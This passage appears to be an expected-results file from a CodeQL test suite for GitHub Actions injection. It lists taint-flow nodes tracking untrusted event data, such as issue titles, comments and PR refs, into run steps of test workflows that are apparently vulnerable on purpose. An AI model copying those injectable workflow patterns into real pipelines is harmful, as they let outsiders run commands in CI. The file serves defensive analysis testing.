.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | 
steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses 
Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | 
env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| 
.github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | 
github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | 
semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| 
.github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | semmle.label | Job: updateJira [ISSUE_KEY] | +| 
.github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | 
steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) 
| semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> 
$GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| 
.github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | 
steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: 
commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| 
.github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| 
